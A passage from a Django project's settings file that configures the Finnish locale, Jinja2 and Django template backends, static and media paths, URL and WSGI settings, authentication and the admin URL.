LANGUAGE_CODE = 'fi-FI'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
_TEMPLATE_CONTEXT_PROCESSORS = [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# Your stuff: custom template context processors go here
]
TEMPLATES = [
{
'BACKEND': "django_jinja.backend.Jinja2",
'APP_DIRS': False,
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
'match_extension': '.jinja',
'context_processors': _TEMPLATE_CONTEXT_PROCESSORS,
'newstyle_gettext': True
}
},
{
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'APP_DIRS': False,
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': _TEMPLATE_CONTEXT_PROCESSORS,
},
},
]
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
str(APPS_DIR.path('static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'
# Location of root django.contrib.admin URL, use {% url 'admin:index' %}
ADMIN_URL = r'^admin/'
# Your common stuff: Below this line define 3rd party library settings
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.